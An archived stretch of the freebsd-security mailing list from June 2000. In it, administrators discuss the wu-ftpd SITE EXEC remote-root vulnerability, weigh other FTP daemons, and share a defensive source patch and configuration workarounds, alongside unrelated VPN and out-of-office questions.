[207.246.128.54]) by hub.freebsd.org (Postfix) with ESMTP id DB90B37B94D for ; Thu, 22 Jun 2000 23:07:32 -0700 (PDT) (envelope-from todd@flyingcroc.net) Received: from localhost (todd@localhost) by security1.noc.flyingcroc.net (8.9.3/8.9.3) with ESMTP id XAA02183; Thu, 22 Jun 2000 23:05:31 -0700 (PDT) (envelope-from todd@flyingcroc.net) X-Authentication-Warning: security1.noc.flyingcroc.net: todd owned process doing -bs Date: Thu, 22 Jun 2000 23:05:31 -0700 (PDT) From: Todd Backman X-Sender: todd@security1.noc.flyingcroc.net To: Will Andrews Cc: Todd Backman , security@FreeBSD.ORG Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-00:23.ip-options In-Reply-To: <20000622222633.C67587@argon.gryphonsoft.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org If I could get a good sysadmin I would. 300+ FreeBSD servers are a bit much for me to handle... ;^) Thanks. - Todd On Thu, 22 Jun 2000, Will Andrews wrote: > On Thu, Jun 22, 2000 at 05:01:06PM -0700, Todd Backman wrote: > > Can anyone hit me with the cluestick? > > Sure. Try having an up-to-date FreeBSD source tree. :-) > > In that case you won't even need the patches. :-) > > -- > Will Andrews > GCS/E/S @d- s+:+>+:- a--->+++ C++ UB++++ P+ L- E--- W+++ !N !o ?K w--- > ?O M+ V-- PS+ PE++ Y+ PGP+>+++ t++ 5 X++ R+ tv+ b++>++++ DI+++ D+ > G++>+++ e->++++ h! r-->+++ y? > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 23 4: 1:51 2000 Delivered-To: freebsd-security@freebsd.org Received: from cage.simianscience.com (cage.simianscience.com [64.7.134.1]) by hub.freebsd.org (Postfix) with ESMTP id 0939B37C20A for ; Fri, 23 Jun 2000 04:01:49 -0700 (PDT) (envelope-from mike@sentex.net) Received: from chimp ([192.168.0.2]) by cage.simianscience.com (8.9.3/8.9.3) with ESMTP id HAA03367; Fri, 23 Jun 2000 07:01:45 -0400 (EDT) (envelope-from mike@sentex.net) Message-Id: <4.2.2.20000623065600.0323bf08@mail.sentex.net> X-Sender: mdtancsa@mail.sentex.net X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.2 Date: Fri, 23 Jun 2000 06:57:32 -0400 To: Mike Silbersack From: Mike Tancsa Subject: Re: Fwd: WuFTPD: Providing *remote* root since at least1994 Cc: freebsd-security@FreeBSD.ORG In-Reply-To: References: <4.2.2.20000622233159.0351a7d8@mail.sentex.net> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 11:08 PM 6/22/2000 -0500, Mike Silbersack wrote: >Hm, yeah, I tried searching freshmeat for ftpds, and proftpd seems like >the only other full-featured one. Well, I'm getting glad I don't need to >run a ftpd. :) Its had its share as well if I recall correctly. Dont know if as many, or if the authors are that much more careful about coding for security. ---Mike -------------------------------------------------------------------- Mike Tancsa, tel +1 519 651 3400 Network Administration, mike@sentex.net Sentex Communications www.sentex.net Cambridge, Ontario Canada www.sentex.net/mike To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 23 6:38:33 2000 Delivered-To: freebsd-security@freebsd.org Received: from altair.origenbio.com (altair.origenbio.com [216.30.62.130]) by hub.freebsd.org (Postfix) with ESMTP id 2850437B9F2 for ; Fri, 23 Jun 2000 06:38:27 -0700 (PDT) (envelope-from dmartin@origen.com) Received: from origen.com (dubhe.origen [192.168.0.5]) by altair.origenbio.com (8.9.3/8.9.3) with ESMTP id IAA27442; Fri, 23 Jun 2000 08:38:18 -0500 (CDT) (envelope-from dmartin@origen.com) Message-ID: <39538382.DE37562A@origen.com> Date: Fri, 23 Jun 2000 08:34:26 -0700 From: Richard Martin X-Mailer: Mozilla 4.73 [en] (Windows NT 5.0; U) X-Accept-Language: en MIME-Version: 1.0 To: Mike Tancsa Cc: Mike Silbersack , freebsd-security@FreeBSD.ORG Subject: Re: Fwd: WuFTPD: References: <4.2.2.20000622233159.0351a7d8@mail.sentex.net> <4.2.2.20000623065600.0323bf08@mail.sentex.net> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org How about the relative obscurity route - using a less widespread FTP system, like ncftpd? Granted it costs, but the license is only about $30. Anyone have any experience with this one? -- Richard Martin dmartin@origen.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 23 6:42:19 2000 Delivered-To: freebsd-security@freebsd.org Received: from www.doutlets.com (cj123195-a.alex1.va.home.com [24.13.245.248]) by hub.freebsd.org (Postfix) with ESMTP id DED8E37B9F2 for ; Fri, 23 Jun 2000 06:42:14 -0700 (PDT) (envelope-from marcus@doutlets.com) Received: from cj123195-a.alex1.va.home.com (marcus@cj123195-a.alex1.va.home.com [24.13.245.248]) by www.doutlets.com (8.10.2/8.10.1) with ESMTP id e5NDg9e30390; Fri, 23 Jun 2000 13:42:09 GMT Date: Fri, 23 Jun 2000 13:42:08 +0000 (GMT) From: Mark Canter To: Richard Martin Cc: Mike Tancsa , Mike Silbersack , freebsd-security@FreeBSD.ORG Subject: Re: Fwd: WuFTPD: In-Reply-To: <39538382.DE37562A@origen.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I have chosen to stick with proftpd (www.proftpd.net), license is GPL. Config-style is similar to apache. On Fri, 23 Jun 2000, Richard Martin wrote: > How about the relative obscurity route - using a less widespread FTP > system, like ncftpd? Granted it costs, but the license is only about > $30. > > Anyone have any experience with this one? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 23 6:51:44 2000 Delivered-To: freebsd-security@freebsd.org Received: from ns1.via-net-works.net.ar (ns1.via-net-works.net.ar [200.10.100.10]) by hub.freebsd.org (Postfix) with ESMTP id EA92837C333 for ; Fri, 23 Jun 2000 06:51:34 -0700 (PDT) (envelope-from fpscha@ns1.via-net-works.net.ar) Received: (from fpscha@localhost) by ns1.via-net-works.net.ar (8.9.3/8.9.3) id KAA07596 for security@freebsd.org; Fri, 23 Jun 2000 10:48:41 -0300 (GMT) From: Fernando Schapachnik Message-Id: <200006231348.KAA07596@ns1.via-net-works.net.ar> Subject: Passive FTP ports in ProFTPd To: security@freebsd.org Date: Fri, 23 Jun 2000 10:48:40 -0300 (GMT) Reply-To: Fernando Schapachnik X-Mailer: ELM [version 2.4ME+ PL40 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 8bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hello: (I know I should be better off asking in some ProFTPd list, but I'm not subscribed right know to any of them and maybe somebody here faced the same troubles.) I switched to ProFTPd due to the wu-ftpd exploit posted today. The thing is, I used the "passive port " directive of wu-ftpd in order to match these ports in the firewall. Anybody knows how to achieve the same with ProFTPd? I couldn't find anything similar in the docs. Thanks! Fernando P. Schapachnik Administración de la red VIA NET.WORKS ARGENTINA S.A. fernando@via-net-works.net.ar (54-11) 4323-3333 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 23 7:58:30 2000 Delivered-To: freebsd-security@freebsd.org Received: from fling.sanbi.ac.za (fling.sanbi.ac.za [196.38.142.119]) by hub.freebsd.org (Postfix) with ESMTP id 3E48237B913 for ; Fri, 23 Jun 2000 07:58:24 -0700 (PDT) (envelope-from johann@egenetics.com) Received: from johann by fling.sanbi.ac.za with local (Exim 3.13 #4) id 135Ut6-0003ef-00; Fri, 23 Jun 2000 16:56:56 +0200 Date: Fri, 23 Jun 2000 16:56:56 +0200 From: Johann Visagie To: Fernando Schapachnik Cc: security@FreeBSD.ORG Subject: Re: Passive FTP ports in ProFTPd Message-ID: <20000623165656.D13039@fling.sanbi.ac.za> References: <200006231348.KAA07596@ns1.via-net-works.net.ar> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2i In-Reply-To: <200006231348.KAA07596@ns1.via-net-works.net.ar>; from fpscha@ns1.via-net-works.net.ar on Fri, Jun 23, 2000 at 10:48:40AM -0300 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Fernando Schapachnik on 2000-06-23 at 10:48:40 -0300: > > I switched to ProFTPd due to the wu-ftpd exploit posted today. Despite the fact that ProFTPd is advertised as secure, it has had several security scares and is generally regarded (at least among the people I to talk to) as being a bad choice from a security perspective. See for instance what Dan Bernstein has to say about it: http://cr.yp.to/publicfile.html (3/4 way down the page) -- V To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 23 8: 0:21 2000 Delivered-To: freebsd-security@freebsd.org Received: from oxmail.ox.ac.uk (oxmail3.ox.ac.uk [129.67.1.180]) by hub.freebsd.org (Postfix) with ESMTP id C7DBF37B913 for ; Fri, 23 Jun 2000 08:00:14 -0700 (PDT) (envelope-from neil.long@computing-services.oxford.ac.uk) Received: from ratbert.oucs.ox.ac.uk ([163.1.14.71]) by oxmail.ox.ac.uk with esmtp (Exim 3.12 #1) id 135UwD-0001uq-00 for freebsd-security@freebsd.org; Fri, 23 Jun 2000 16:00:09 +0100 Received: from neil by ratbert.oucs.ox.ac.uk with local (Exim 3.14 #1) id 135Uvj-00032e-00 for freebsd-security@FreeBSD.ORG; Fri, 23 Jun 2000 15:59:39 +0100 From: "Neil Long" Message-Id: <1000623155939.ZM11694@ratbert.oucs.ox.ac.uk> Date: Fri, 23 Jun 2000 15:59:39 +0100 In-Reply-To: Mark Canter "Re: Fwd: WuFTPD:" (Jun 23, 1:42pm) References: X-Mailer: Z-Mail (5.0.0 30July97) To: freebsd-security@FreeBSD.ORG Subject: Re: Fwd: WuFTPD: MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Looking, albeit briefly, at the exploit and the wu-ftpd src might it not be simpler to either define PARANOID (there is a configure option in 2.6) or just plain rip out SITE EXEC support altogether? I am not saying this is a fix but in the short term while the exploit code is still in early stages of widespread distribution (it has a "broken to avoid kids usage ;)" comment but I have not looked in to it.) Neil -- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Dr Neil J Long, Computing Services, University of Oxford 13 Banbury Road, Oxford, OX2 6NN, UK Tel:+44 1865 273232 Fax:+44 1865 273275 EMail: Neil.Long@computing-services.oxford.ac.uk PGP: ID 0xE88EF71F OxCERT: oxcert@ox.ac.uk PGP: ID 0x4B11561D To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 23 8:19:17 2000 Delivered-To: freebsd-security@freebsd.org Received: from sharmas.dhs.org (c62443-a.frmt1.sfba.home.com [24.0.69.165]) by hub.freebsd.org (Postfix) with ESMTP id 63A3937B6F2 for ; Fri, 23 Jun 2000 08:19:15 -0700 (PDT) (envelope-from adsharma@sharmas.dhs.org) Received: (from adsharma@localhost) by sharmas.dhs.org (8.9.3/8.9.3) id IAA00968 for security@freebsd.org; Fri, 23 Jun 2000 08:18:28 -0700 Date: Fri, 23 Jun 2000 08:18:28 -0700 From: Arun Sharma To: security@freebsd.org Subject: FreeBSD 4.0 ipsec and Nortel extranet Message-ID: <20000623081828.A963@sharmas.dhs.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org My work place uses Nortel extranet ipsec for VPN and I'm forced to connect using my windows box. I was wondering if anyone had any success connecting a FreeBSD box to the Nortel server. Any pointers would be highly appreciated. -Arun To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 23 8:20: 7 2000 Delivered-To: freebsd-security@freebsd.org Received: from ns1.via-net-works.net.ar (ns1.via-net-works.net.ar [200.10.100.10]) by hub.freebsd.org (Postfix) with ESMTP id 3A5F437B556 for ; Fri, 23 Jun 2000 08:20:00 -0700 (PDT) (envelope-from fpscha@ns1.via-net-works.net.ar) Received: (from fpscha@localhost) by ns1.via-net-works.net.ar (8.9.3/8.9.3) id MAA28360; Fri, 23 Jun 2000 12:19:10 -0300 (GMT) From: Fernando Schapachnik Message-Id: <200006231519.MAA28360@ns1.via-net-works.net.ar> Subject: Re: Passive FTP ports in ProFTPd In-Reply-To: <20000623165656.D13039@fling.sanbi.ac.za> from Johann Visagie at "Jun 23, 0 04:56:56 pm" To: johann@egenetics.com (Johann Visagie) Date: Fri, 23 Jun 2000 12:19:10 -0300 (GMT) Cc: fpscha@via-net-works.net.ar, security@FreeBSD.ORG Reply-To: Fernando Schapachnik X-Mailer: ELM [version 2.4ME+ PL40 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 8bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org En un mensaje anterior, Johann Visagie escribió: > Fernando Schapachnik on 2000-06-23 at 10:48:40 -0300: > > > > I switched to ProFTPd due to the wu-ftpd exploit posted today. > > Despite the fact that ProFTPd is advertised as secure, it has had several > security scares and is generally regarded (at least among the people I to > talk to) as being a bad choice from a security perspective. > > See for instance what Dan Bernstein has to say about it: > http://cr.yp.to/publicfile.html (3/4 way down the page) Not very encouraging... The ones he mentions as "secure" lack most features I need. Any suggestion? (I can't use stock FreeBSD ftpd right now because it will require a lot of programming -- I need to maintain configuration compatibility accross platforms). Thanks! Fernando P. Schapachnik Administración de la red VIA NET.WORKS ARGENTINA S.A. fernando@via-net-works.net.ar (54-11) 4323-3333 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 23 8:22:10 2000 Delivered-To: freebsd-security@freebsd.org Received: from neo.bleeding.com (neo.bleeding.com [209.10.61.250]) by hub.freebsd.org (Postfix) with ESMTP id D5D7E37B721 for ; Fri, 23 Jun 2000 08:22:06 -0700 (PDT) (envelope-from jjwolf@bleeding.com) Received: from localhost (jjwolf@localhost) by neo.bleeding.com (8.9.3/8.9.3) with ESMTP id IAA61342; Fri, 23 Jun 2000 08:21:51 -0700 (PDT) Date: Fri, 23 Jun 2000 08:21:51 -0700 (PDT) From: Justin Wolf To: Arun Sharma Cc: security@FreeBSD.ORG Subject: Re: FreeBSD 4.0 ipsec and Nortel extranet In-Reply-To: <20000623081828.A963@sharmas.dhs.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The newsgroup comp.dcom.sys.bay-networks sometimes talks about Nortel's extranet products. You might try there. -Justin On Fri, 23 Jun 2000, Arun Sharma wrote: > My work place uses Nortel extranet ipsec for VPN and I'm forced to > connect using my windows box. I was wondering if anyone had any > success connecting a FreeBSD box to the Nortel server. > > Any pointers would be highly appreciated. > > -Arun > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 23 8:54: 5 2000 Delivered-To: freebsd-security@freebsd.org Received: from icg.interactivate.com (icg.interactivate.com [207.110.42.216]) by hub.freebsd.org (Postfix) with ESMTP id D1A4837B92E for ; Fri, 23 Jun 2000 08:53:58 -0700 (PDT) (envelope-from larry@interactivate.com) Received: from localhost (larry@localhost) by icg.interactivate.com (8.10.1/8.10.1) with ESMTP id e5NFukR04254; Fri, 23 Jun 2000 08:56:46 -0700 (PDT) Date: Fri, 23 Jun 2000 08:56:45 -0700 (PDT) From: Larry Sica X-Sender: larry@icg To: Richard Martin Cc: Mike Tancsa , Mike Silbersack , freebsd-security@FreeBSD.ORG Subject: Re: Fwd: WuFTPD: In-Reply-To: <39538382.DE37562A@origen.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, 23 Jun 2000, Richard Martin wrote: > How about the relative obscurity route - using a less widespread FTP > system, like ncftpd? Granted it costs, but the license is only about > $30. > > Anyone have any experience with this one? I use it on all my servers, it's only 49.99 for a 50-user license, unlimited is like 199 i think, have to check on that. It does not run out of inetd (which is nice), has its own logging facility (Which can be tied to syslog), allows for virtual users as well so you could setup users w/o shells or give users different ftp passwords. It supports all the usual stuff, /etc/shells, ftpuser, etc. It's configuration also allows for multiple domains hosted on the same server think vhosting of websites it's similar to that. the domain is www.ncftp.com oh yeah it's free for personal use (3 or more sim. users). > > -- > Richard Martin dmartin@origen.com > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 23 9:21:23 2000 Delivered-To: freebsd-security@freebsd.org Received: from molybdenum.systems.cais.net (molybdenum.systems.cais.net [205.177.9.248]) by hub.freebsd.org (Postfix) with ESMTP id A5C6A37B764 for ; Fri, 23 Jun 2000 09:21:17 -0700 (PDT) (envelope-from herb@cais.net) Received: from localhost (localhost [127.0.0.1]) by molybdenum.systems.cais.net (8.9.3/8.9.3) with ESMTP id MAA17570 for ; Fri, 23 Jun 2000 12:39:02 -0400 (EDT) Date: Fri, 23 Jun 2000 12:39:02 -0400 (EDT) From: "Herbert J. McNew" X-Sender: herb@molybdenum.systems.cais.net To: security@FreeBSD.ORG Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-00:23.ip-options In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Maybe I missed it, but does anyone have an exploit for this yet? I have a solution (that isn's a kernel recompile) that I'd like to test, but have no way of doing so without an exploit. Thanks. _____________________ Herb McNew Systems Administrator CAIS Internet (703) 247-6270 herb@cais.net To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 23 10:13:40 2000 Delivered-To: freebsd-security@freebsd.org Received: from khavrinen.lcs.mit.edu (khavrinen.lcs.mit.edu [18.24.4.193]) by hub.freebsd.org (Postfix) with ESMTP id 0085337C3B5 for ; Fri, 23 Jun 2000 10:13:32 -0700 (PDT) (envelope-from wollman@khavrinen.lcs.mit.edu) Received: (from wollman@localhost) by khavrinen.lcs.mit.edu (8.9.3/8.9.3) id NAA49665; Fri, 23 Jun 2000 13:13:19 -0400 (EDT) (envelope-from wollman) Date: Fri, 23 Jun 2000 13:13:19 -0400 (EDT) From: Garrett Wollman Message-Id: <200006231713.NAA49665@khavrinen.lcs.mit.edu> To: Mike Silbersack Cc: freebsd-security@FreeBSD.ORG Subject: Re: Fwd: WuFTPD: Providing *remote* root since at least1994 In-Reply-To: References: <4.2.2.20000622201823.0479a690@mail.sentex.net> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 < said: > (Does anyone actually still run it?) Absolutely. Here's a patch (mangled by cut&paste) which hacks around the problem. Stick it in patches/patch-ftpcmd.y-MIT-IS for best results. This hack was put together by MIT Information Systems as a stopgap until the wu-ftpd developers come up with an official fix. *** src/ftpcmd.y.old Fri Jun 23 00:44:11 2000 - --- src/ftpcmd.y Fri Jun 23 00:48:36 2000 *************** *** 1460,1469 **** - --- 1460,1474 ---- if (wu_getline(cbuf, sizeof(cbuf) - 1, stdin) == NULL) { (void) alarm(0); reply(221, "You could at least say goodbye."); dologout(0); } + else if (strchr(cbuf, '%')) { + (void) alarm(0); + reply(421, "The command line contained a %% character."); + dologout(0); + } #ifndef IGNORE_NOOP (void) alarm(0); #endif if ((cp = strchr(cbuf, '\r'))) { *cp++ = '\n'; -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.1 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE5U5qlI+eG6b7tlG4RAqNBAJ9dLOLVO3hBhNM22gBMtrJYttCO0ACgobsD E9wtuVVqPIpjNoBO0hY3Dqo= =fbsD -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 23 12:52:28 2000 Delivered-To: freebsd-security@freebsd.org Received: from wat-border.sentex.ca (waterloo-hespler.sentex.ca [199.212.135.66]) by hub.freebsd.org (Postfix) with ESMTP id 821B437BA30 for ; Fri, 23 Jun 2000 12:52:20 -0700 (PDT) (envelope-from mike@sentex.ca) Received: from granite.sentex.net (granite-atm.sentex.ca [209.112.4.1]) by wat-border.sentex.ca (8.9.3/8.9.3) with ESMTP id PAA39834; Fri, 23 Jun 2000 15:52:19 -0400 (EDT) (envelope-from mike@sentex.ca) Received: from simoeon (simeon.sentex.ca [209.112.4.47]) by granite.sentex.net (8.8.8/8.6.9) with SMTP id PAA28284; Fri, 23 Jun 2000 15:52:15 -0400 (EDT) Message-Id: <3.0.5.32.20000623154848.02d2d6c0@marble.sentex.ca> X-Sender: mdtpop@marble.sentex.ca X-Mailer: QUALCOMM Windows Eudora Light Version 3.0.5 (32) Date: Fri, 23 Jun 2000 15:48:48 -0400 To: Garrett Wollman From: Mike Tancsa Subject: Re: Fwd: WuFTPD: Providing *remote* root since at least1994 Cc: freebsd-security@FreeBSD.ORG In-Reply-To: <200006231713.NAA49665@khavrinen.lcs.mit.edu> References: <4.2.2.20000622201823.0479a690@mail.sentex.net> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org What about --enable-paranoid as part of the config ? As so much seems to be related to the site exec command, perhaps its best to just disable this ? ---Mike At 01:13 PM 6/23/00 -0400, Garrett Wollman wrote: >-----BEGIN PGP SIGNED MESSAGE----- >Hash: SHA1 > >< said: > >> (Does anyone actually still run it?) > >Absolutely. > >Here's a patch (mangled by cut&paste) which hacks around the problem. >Stick it in patches/patch-ftpcmd.y-MIT-IS for best results. This hack >was put together by MIT Information Systems as a stopgap until the >wu-ftpd developers come up with an official fix. > >*** src/ftpcmd.y.old Fri Jun 23 00:44:11 2000 >- --- src/ftpcmd.y Fri Jun 23 00:48:36 2000 >*************** >*** 1460,1469 **** >- --- 1460,1474 ---- > if (wu_getline(cbuf, sizeof(cbuf) - 1, stdin) == NULL) { > (void) alarm(0); > reply(221, "You could at least say goodbye."); > dologout(0); > } >+ else if (strchr(cbuf, '%')) { >+ (void) alarm(0); >+ reply(421, "The command line contained a %% character."); >+ dologout(0); >+ } > #ifndef IGNORE_NOOP > (void) alarm(0); > #endif > if ((cp = strchr(cbuf, '\r'))) { > *cp++ = '\n'; >-----BEGIN PGP SIGNATURE----- >Version: GnuPG v1.0.1 (FreeBSD) >Comment: For info see http://www.gnupg.org > >iD8DBQE5U5qlI+eG6b7tlG4RAqNBAJ9dLOLVO3hBhNM22gBMtrJYttCO0ACgobsD >E9wtuVVqPIpjNoBO0hY3Dqo= >=fbsD >-----END PGP SIGNATURE----- > > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security" in the body of the message > > > ------------------------------------------------------------------------ Mike Tancsa, tel +1 519 651 3400 Sentex Communications mike@sentex.net Cambridge, Ontario Canada www.sentex.net To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 23 13:34:46 2000 Delivered-To: freebsd-security@freebsd.org Received: from erouter0.it-datacntr.louisville.edu (erouter0.it-datacntr.louisville.edu [136.165.1.36]) by hub.freebsd.org (Postfix) with ESMTP id 6884F37B8B9 for ; Fri, 23 Jun 2000 13:34:37 -0700 (PDT) (envelope-from k.stevenson@louisville.edu) Received: from osaka.louisville.edu (osaka.louisville.edu [136.165.1.114]) by erouter0.it-datacntr.louisville.edu (Postfix) with ESMTP id 6E2E8251F3; Fri, 23 Jun 2000 16:34:12 -0400 (EDT) Received: by osaka.louisville.edu (Postfix, from userid 15) id 77DCC18616; Fri, 23 Jun 2000 16:34:11 -0400 (EDT) Date: Fri, 23 Jun 2000 16:34:11 -0400 From: Keith Stevenson To: Mike Tancsa Cc: Garrett Wollman , freebsd-security@FreeBSD.ORG Subject: Re: Fwd: WuFTPD: Providing *remote* root since at least1994 Message-ID: <20000623163411.A1412@osaka.louisville.edu> References: <4.2.2.20000622201823.0479a690@mail.sentex.net> <200006231713.NAA49665@khavrinen.lcs.mit.edu> <3.0.5.32.20000623154848.02d2d6c0@marble.sentex.ca> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2i In-Reply-To: <3.0.5.32.20000623154848.02d2d6c0@marble.sentex.ca>; from mike@sentex.ca on Fri, Jun 23, 2000 at 03:48:48PM -0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, Jun 23, 2000 at 03:48:48PM -0400, Mike Tancsa wrote: > What about > > --enable-paranoid > > as part of the config ? As so much seems to be related to the site exec > command, perhaps its best to just disable this ? While I'm all for actually fixing the problems in the code, I've found that the --enable-paranoid options to be a good one. I've been tinkering around with the exploit and the paranoid option seems to defend against it. I don't think that any of my users will miss the SITE EXEC commands. --enable-paranoid probably should be added to the port build. Regards, --Keith Stevenson-- -- Keith Stevenson System Programmer - Data Center Services - University of Louisville k.stevenson@louisville.edu GPG key fingerprint = 332D 97F0 6321 F00F 8EE7 2D44 00D8 F384 75BB 89AE To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 23 15:16: 2 2000 Delivered-To: freebsd-security@freebsd.org Received: from kcmso1.proxy.att.com (kcmso1.att.com [192.128.133.69]) by hub.freebsd.org (Postfix) with ESMTP id 4663037B78D for ; Fri, 23 Jun 2000 15:15:46 -0700 (PDT) (envelope-from fastd@att.com) Received: from gab200r1.ems.att.com ([135.37.94.32]) by kcmso1.proxy.att.com (AT&T IPNS/MSO-2.2) with ESMTP id SAA11484 for ; Fri, 23 Jun 2000 18:15:38 -0400 (EDT) Received: from mo3980bh2.ems.att.com by gab200r1.ems.att.com (8.8.8+Sun/ATTEMS-1.4.1 sol2) id SAA13777; Fri, 23 Jun 2000 18:17:12 -0400 (EDT) Received: by mo3980bh2.ems.att.com with Internet Mail Service (5.5.2650.21) id ; Fri, 23 Jun 2000 17:15:37 -0500 Message-ID: <5D6D2EC6E987D31199EC00902799EC4A020A7BEB@mo3980po01.ems.att.com> From: "Fast, Daniel H (Danny), SITS" Cc: security@FreeBSD.ORG Subject: Out of Office? Date: Fri, 23 Jun 2000 17:15:35 -0500 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2650.21) Content-Type: text/plain; charset="iso-8859-1" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I have outlook [no flames] but I am leaving......and want to turn my out of office on.....will that respond to the entire list I am on? D~y To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 23 15:24:45 2000 Delivered-To: freebsd-security@freebsd.org Received: from snafu.adept.org (adsl-63-201-63-44.dsl.snfc21.pacbell.net [63.201.63.44]) by hub.freebsd.org (Postfix) with ESMTP id EA21037B649 for ; Fri, 23 Jun 2000 15:24:40 -0700 (PDT) (envelope-from mike@adept.org) Received: by snafu.adept.org (Postfix, from userid 1000) id 884AF9EE01; Fri, 23 Jun 2000 15:24:32 -0700 (PDT) Received: from localhost (localhost [127.0.0.1]) by snafu.adept.org (Postfix) with ESMTP id 7E4619B001; Fri, 23 Jun 2000 15:24:32 -0700 (PDT) Date: Fri, 23 Jun 2000 15:24:32 -0700 (PDT) From: Mike To: "Fast, Daniel H (Danny), SITS" Cc: security@FreeBSD.ORG Subject: Re: Out of Office? In-Reply-To: <5D6D2EC6E987D31199EC00902799EC4A020A7BEB@mo3980po01.ems.att.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org If properly configured, I believe it should send to the From: (which would be the poster, not the list) not the Reply-To: (the list), and it should only do that once. I don't have Outlook experience, but that's the way the vacation program has worked for me in the past (similar unix utility). -mrh On Fri, 23 Jun 2000, Fast, Daniel H (Danny), SITS wrote: > I have outlook [no flames] but I am leaving......and want to turn my out of > office on.....will that respond to the entire list I am on? > > D~y > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 23 15:59:23 